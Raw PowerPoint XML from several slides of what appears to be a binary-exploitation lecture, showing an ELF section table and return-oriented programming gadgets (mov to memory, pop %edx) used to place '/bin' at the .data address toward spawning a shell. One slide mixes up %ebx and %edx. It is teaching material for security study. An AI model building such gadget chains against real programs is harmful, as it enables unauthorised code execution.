              </a:rPr>
              <a:t>  0   0  1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[16] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>tdata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>            PROGBITS        080e9f58 0a0f58 000010 00 WAT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[17] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>tbss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>             NOBITS          080e9f68 0a0f68 000018 00 WAT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[18] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>init_array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>       INIT_ARRAY      080e9f68 0a0f68 000008 00  WA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[19] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fini_array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>       FINI_ARRAY      080e9f70 0a0f70 000008 00  WA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[20] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>jcr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>              PROGBITS        080e9f78 0a0f78 000004 00  WA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[21] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>data.rel.ro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>      PROGBITS        080e9f80 0a0f80 000070 00  WA  0   0 32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[22] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>got</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>              PROGBITS        080e9ff0 0a0ff0 000008 04  WA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[23] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>got.plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>          PROGBITS        080ea000 0a1000 000044 04  WA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[24] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>             PROGBITS        080ea060 0a1060 000f20 00  WA  0   0 32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[25] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>bss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>              NOBITS          080eaf80 0a1f80 00136c 00  WA  0   0 32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[26] __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>libc_freeres_pt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> NOBITS          080ec2ec 0a1f80 000018 00  WA  0   0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[27] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>comment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>          PROGBITS        00000000 0a1f80 00002b 01  MS  0   0  1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[28] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>shstrtab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>         STRTAB          00000000 0a1fab 00014c 00      0   0  1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[29] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>symtab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>           SYMTAB          00000000 0a25d0 008b70 10     30 1055  4  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[30] .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strtab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>           STRTAB          00000000 0ab140 007eac 00      0   0  1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>172</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="161617" y="5216055"/>
            <a:ext cx="8203155" cy="190831"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="2540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694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6" end="1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17" end="17"/>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
                                            <p:txEl>
                                              <p:pRg st="18" end="18"/>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
                                            <p:txEl>
                                              <p:pRg st="19" end="19"/>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
                                            <p:txEl>
                                              <p:pRg st="20" end="20"/>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
                                            <p:txEl>
                                              <p:pRg st="21" end="21"/>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
                                            <p:txEl>
                                              <p:pRg st="22" end="22"/>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xEl>
                                              <p:pRg st="23" end="23"/>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24" end="24"/>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
                                            <p:txEl>
                                              <p:pRg st="25" end="25"/>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3">
                                            <p:txEl>
                                              <p:pRg st="26" end="26"/>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
                                            <p:txEl>
                                              <p:pRg st="27" end="27"/>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
                                            <p:txEl>
                                              <p:pRg st="28" end="2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
                                            <p:txEl>
                                              <p:pRg st="29" end="29"/>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30" end="30"/>
                                            </p:txEl>
                                          </p:spTgt>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3">
                                            <p:txEl>
                                              <p:pRg st="31" end="31"/>
                                            </p:txEl>
                                          </p:spTgt>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
                                            <p:txEl>
                                              <p:pRg st="32" end="32"/>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
                                            <p:txEl>
                                              <p:pRg st="33" end="33"/>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
                                            <p:txEl>
                                              <p:pRg st="34" end="34"/>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ROP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Need to find a gadget that will write some data to a location then return</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>After much searching:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>809a67d:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>89 02</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,(%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>809a67f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>:			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>c3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>This gadget will copy whatever’s in %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> into the memory location that %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> points to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>So, if we have %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> be the data "/bin"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>And %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> be &amp;.data (0x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>080ea060</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Then, we will have /bin at a fixed memory location</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Need more gadgets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>173</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1674274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ROP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Need a gadget to get our data into %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>edx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pop %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>edx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>806e91a:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>5a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>pop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>806e91b:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>c3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>This gadget will take whatever is on the top of the stack and put it in %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>How does this help us?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
